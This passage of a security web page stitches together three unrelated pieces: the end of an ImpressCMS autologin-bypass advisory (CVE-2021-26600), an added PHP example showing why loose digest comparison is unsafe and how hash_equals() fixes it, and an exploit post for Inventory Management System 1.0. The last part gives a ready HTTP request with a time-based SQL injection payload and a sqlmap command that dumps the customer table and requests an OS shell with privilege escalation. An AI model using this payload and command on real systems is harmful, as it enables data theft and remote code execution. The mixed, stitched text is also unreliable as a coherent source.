without knowledge of the password.<br /><br /><br />[-] Solution:<br /><br />Upgrade to version 1.4.3 or later.<br /><br /><br />[-] Disclosure Timeline:<br /><br />[20/01/2021] - Vendor notified through HackerOne<br />[02/02/2021] - Vendor replied this has been resolved and will be in <br />ImpressCMS 1.4.3<br />[03/02/2021] - CVE number assigned<br />[06/02/2022] - Version 1.4.3 released<br />[22/03/2022] - Public disclosure<br /><br /><br />[-] CVE Reference:<br /><br />The Common Vulnerabilities and Exposures project (cve.mitre.org)<br />has assigned the name CVE-2021-26600 to this vulnerability.<br /><br /><br />[-] Credits:<br /><br />Vulnerability discovered by Egidio Romano.<br /><br /><br />[-] Other References:<br /><br />https://hackerone.com/reports/1081986<br /><br /><br />[-] Original Advisory:<br /><br />http://karmainsecurity.com/KIS-2022-01<br /><br /></code></pre>
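<p>Added example (not ImpressCMS code): why the "!=" at lines 62-63 is unsafe for comparing a computed digest with a cookie-supplied string, and what hash_equals() gives instead. The digest strings, secrets and cookie values are constructed, and the date portion of the cookie is assumed to be strtotime()-parsable rather than the original Ynj format.</p>

```php
<?php
// Added example (not ImpressCMS code): why the "!=" at lines 62-63 is
// unsafe for comparing a computed digest with a cookie-supplied string, and
// what to use instead. Secrets and cookie values below are constructed.

declare(strict_types=1);

/** The vulnerable shape: loose inequality between a hex digest and user input. */
function digestMatchesLoose(string $expected, mixed $provided): bool
{
    return !($expected != $provided);       // == semantics, with type juggling
}

/** Strict inequality: no juggling, but still an early-exit string compare. */
function digestMatchesStrict(string $expected, mixed $provided): bool
{
    return !($expected !== $provided);
}

/** Recommended: same type required, constant-time, never throws on non-strings. */
function digestMatchesSafe(string $expected, mixed $provided): bool
{
    return is_string($provided) && hash_equals($expected, $provided);
}

/**
 * Mirror of the autologin check with the safe comparison and a lifetime
 * check. The cookie is "stamp:encpass"; the stamp is assumed here to be a
 * strtotime()-parsable date (the original uses its own Ynj format).
 */
function autologinCookieValid(string $storedPass, string $dbPass, string $dbPrefix,
                              string $cookie, int $lifetime = 604800): bool
{
    $parts = explode(':', $cookie, 2);
    if (count($parts) !== 2) {
        return false;
    }
    [$stamp, $encpass] = $parts;
    $issued = strtotime($stamp);
    if ($issued === false || $issued < time() - $lifetime) {
        return false;                                // expired or malformed stamp
    }
    $expected = md5($storedPass . $dbPass . $dbPrefix . $stamp);
    return digestMatchesSafe($expected, $encpass);
}

// Two numeric-looking strings compare numerically under == (every PHP
// version): both are 0 x 10^n, so PHP treats them as equal even though
// they differ in every digit after "0e".
$expected = '0e' . str_repeat('1', 30);     // constructed, not a real md5 output
$provided = '0e' . str_repeat('2', 30);

printf("loose  : %s\n", digestMatchesLoose($expected, $provided) ? 'MATCH' : 'no match');
printf("strict : %s\n", digestMatchesStrict($expected, $provided) ? 'MATCH' : 'no match');
printf("safe   : %s\n", digestMatchesSafe($expected, $provided) ? 'MATCH' : 'no match');

// Non-string input (e.g. a cookie submitted as an array) must neither match nor throw.
printf("safe[] : %s\n", digestMatchesSafe($expected, ['x']) ? 'MATCH' : 'no match');

// End-to-end with constructed secrets: a genuine cookie versus a tampered digest.
$stamp = date('Y-m-d');
$good = $stamp . ':' . md5('storedhash' . 'dbpass' . 'icms_' . $stamp);
var_dump(autologinCookieValid('storedhash', 'dbpass', 'icms_', $good));
var_dump(autologinCookieValid('storedhash', 'dbpass', 'icms_', $stamp . ':0e111'));
```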
<pre><code># Title: Inventory Management System 1.0 Blind SQLi to RCE<br /># Author: Hejap Zairy<br /># Date: 12.07.2022<br /># Vendor: https://www.vetbossel.in/inventory-management-system-php/<br /># Software: https://cutt.ly/lOZ8lrr<br /># Reference: https://github.com/Matrix07ksa<br /># Tested on: Windows, MySQL, Apache<br /><br /><br /><br /># Vulnerability evidence (SQL error returned by the application)<br /><br />```<br />You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'abhi@123' WHERE `cust`.`custid` = 'C200114'' at line 2 <br />```<br /><br /><br /><br /><br /># Status: CRITICAL<br />[+] Payload POST:<br />```<br />POST /0day/Edit-Details.php HTTP/1.1<br />Host: 0day.gov<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 179<br />Origin: https://0day.gov<br />Connection: close<br />Referer: https://0day.gov/0day/Edit-Details.php<br />Cookie: PHPSESSID=o0p5vujcgkn8pm6llls4nj7qq7<br />Upgrade-Insecure-Requests: 1<br />name=ABHI+boss&password=abhi%40123&phone=422234654&email=abhi1%40gmail.com&address=10+HOLME++STREET%27AND (SELECT 5316 FROM (SELECT(SLEEP(5)))Fohe)-- oRCH&cust_update=Submit+Query<br />```<br /><br /># Blind time-based SQLi to RCE<br /># Exploit<br /><br /><br />sqlmap -r 0day_hejap.txt --hex --time-sec=17 --dbms=mysql --technique=t --random-agent --eta -p address -D order_mgmt -T cust --dump -hh --os-shell --priv-esc <br /><br /># Description:<br />The blind time-based SQLi vulnerability was converted to RCE due to the permissions I have in the database, and it allowed privilege escalation.<br /><br /># Proof and Exploit:<br />https://streamable.com/s09u80<br /></code></pre>